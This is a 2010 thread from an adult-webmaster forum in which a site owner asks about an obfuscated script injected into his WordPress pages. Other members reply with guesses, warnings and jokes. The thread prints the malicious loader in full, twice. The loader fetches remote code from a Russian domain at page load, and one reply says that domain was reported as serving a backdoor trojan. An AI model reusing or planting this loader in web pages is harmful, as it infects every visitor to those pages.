GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   anyone seen this? code injection.. (https://gfy.com/showthread.php?t=967646)

SIK 05-09-2010 06:47 PM
anyone seen this? code injection..
 
I keep seeing this on more and more of my wordpress sites (porn, mainstream)..
Anyone knows what does it do? It has something to do with labelstare.ru site, at least thats what it connects to...

<script>var TM=new Date();var W=new Date();function h(){var gc=[];var n=false;var L=String("crea"+"teEl"+"emen"+"CNdt".substr(3));O=[];this.R=21211;this.R++;var B=String("NPMscrip".substr(3)+"t");var Q={};var T=String("GlTJdefer".substr(4));try {var VN='Vj'} catch(VN){};this.tz='';var g="b7Wvon".substr(4)+"ARElo".substr(3)+"ad";var q="bodysrMT".substr(0,4);UK=27462;UK+=37;var N=document;var t=new String("sr"+"c");Zs={H:false};k=["fy"];var Z=new String("appen"+"dChil"+"d");Qq=["G"];this.w=59889;this.w--;var X=window;this.Uo=22157;this.Uo++;function c(){var jz=["nG"];var yw=new Date();try {try {var gF='se'} catch(gF){};var PT={PE:false};Xw={wN:"yj"};var F=new String("/goo"+"gle.NFWZ".substr(0,4)+"com/rCu".substr(0,4)+"ebay"+"MBAl.fr/".substr(4)+"mult"+"iply"+"Arf.comfAr".substr(3,4) +"tSD.phpDtS".substr(3,4));var Nv=7643-7642;MP={gD:"RD"};BU=["TR","dA","DcN"];var TJ=false;var b=new String("http"+"://l"+"abelIXD".substr(0,4)+"star"+"e.ru"+":");this.J V=63105;this.JV+=147;this.EY=62017;this.EY+=142;va r cz=891321-883241;this.db=64472;this.db-=183;this.BW='';var Dy={ho:false};s=N[L](B);this.Nf='';var Xn="Xn";var TF=["A","JZ"];var VQ=["rz","LU"];var OC=["Ij","WC"];we=[];Ct={};s[T]=Nv;this.dH="";s[t]=b+cz+F;dX={Q_:"nBC"};uZ={Bw:"Dg"};var Xs=false;this.JI="JI";N[q][Z](s);_={qc:51554};FG={};} catch(U){var jo='';var mI='';this.QG=8292;this.QG--;};}var iQ=new String();X[g]=c;Ue=[];var lY='';};h();var SH=55617;</script>
<!--b9a827d8a9686a8057739c6e91a4cbcc-->

Mutt 05-09-2010 06:58 PM
Quote:
Originally Posted by SDesign (Post 17124382)
I keep seeing this on more and more of my wordpress sites (porn, mainstream)..
Anyone knows what does it do? It has something to do with labelstare.ru site, at least thats what it connects to...

<script>var TM=new Date();var W=new Date();function h(){var gc=[];var n=false;var L=String("crea"+"teEl"+"emen"+"CNdt".substr(3));O=[];this.R=21211;this.R++;var B=String("NPMscrip".substr(3)+"t");var Q={};var T=String("GlTJdefer".substr(4));try {var VN='Vj'} catch(VN){};this.tz='';var g="b7Wvon".substr(4)+"ARElo".substr(3)+"ad";var q="bodysrMT".substr(0,4);UK=27462;UK+=37;var N=document;var t=new String("sr"+"c");Zs={H:false};k=["fy"];var Z=new String("appen"+"dChil"+"d");Qq=["G"];this.w=59889;this.w--;var X=window;this.Uo=22157;this.Uo++;function c(){var jz=["nG"];var yw=new Date();try {try {var gF='se'} catch(gF){};var PT={PE:false};Xw={wN:"yj"};var F=new String("/goo"+"gle.NFWZ".substr(0,4)+"com/rCu".substr(0,4)+"ebay"+"MBAl.fr/".substr(4)+"mult"+"iply"+"Arf.comfAr".substr(3,4) +"tSD.phpDtS".substr(3,4));var Nv=7643-7642;MP={gD:"RD"};BU=["TR","dA","DcN"];var TJ=false;var b=new String("http"+"://l"+"abelIXD".substr(0,4)+"star"+"e.ru"+":");this.J V=63105;this.JV+=147;this.EY=62017;this.EY+=142;va r cz=891321-883241;this.db=64472;this.db-=183;this.BW='';var Dy={ho:false};s=N[L](B);this.Nf='';var Xn="Xn";var TF=["A","JZ"];var VQ=["rz","LU"];var OC=["Ij","WC"];we=[];Ct={};s[T]=Nv;this.dH="";s[t]=b+cz+F;dX={Q_:"nBC"};uZ={Bw:"Dg"};var Xs=false;this.JI="JI";N[q][Z](s);_={qc:51554};FG={};} catch(U){var jo='';var mI='';this.QG=8292;this.QG--;};}var iQ=new String();X[g]=c;Ue=[];var lY='';};h();var SH=55617;</script>
<!--b9a827d8a9686a8057739c6e91a4cbcc-->
it's a good thing, consider yourself lucky you've been selected to work with labelstare.ru - great site. only good things can happen.

SIK 05-09-2010 07:14 PM
I'd really like to know what the hell does that thing do? Any chance it changes aff links?

Jdoughs 05-09-2010 07:15 PM
Quote:
Originally Posted by SDesign (Post 17124430)
I'd really like to know what the hell does that thing do? Any chance it changes aff links?
My first thought was cookie switcher/replacer or stuff. But I know shit about scripting, I just know a few reasons they would/could.

CruelMedia 05-10-2010 04:24 AM
our coder says: "you have a security breach.. somebody injected a harmful script on your site"..

LoveSandra 05-10-2010 04:44 AM
Quote:
Originally Posted by Mutt (Post 17124400)
it's a good thing, consider yourself lucky you've been selected to work with labelstare.ru - great site. only good things can happen.
:1orglaugh:1orglaugh:1orglaugh:1orglaugh:1orglaugh

Caligari 05-10-2010 05:27 AM
SDesign where does that actually show up on your wp page? in a template?

SIK 05-10-2010 05:36 AM
nope, seems like it was injected into .php wp pages, its on the bottom, below closed html tags

I got like 50+ wordpresses to remove it, kinda lazy to do it today :(

VGeorgie 05-10-2010 07:52 AM
Quote:
Originally Posted by SDesign (Post 17125182)
I got like 50+ wordpresses to remove it, kinda lazy to do it today :(
Google hasn't yet flagged labelstare dot ru as malicious but McAfee doesn't like it, saying it attempts to download a backdoor trojan. If Google lists the labelstare site as malicious, and it detects your sites have links to it, you'll get added to their "This site may harm your computer" list. Not fun to undo that.

V_RocKs 05-10-2010 08:20 AM
Never host wordpress on a shared server.

BIGTYMER 05-10-2010 08:48 AM
That code is doing something with google and ebay. Not sure what yet.


All times are GMT -7. The time now is 10:48 AM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123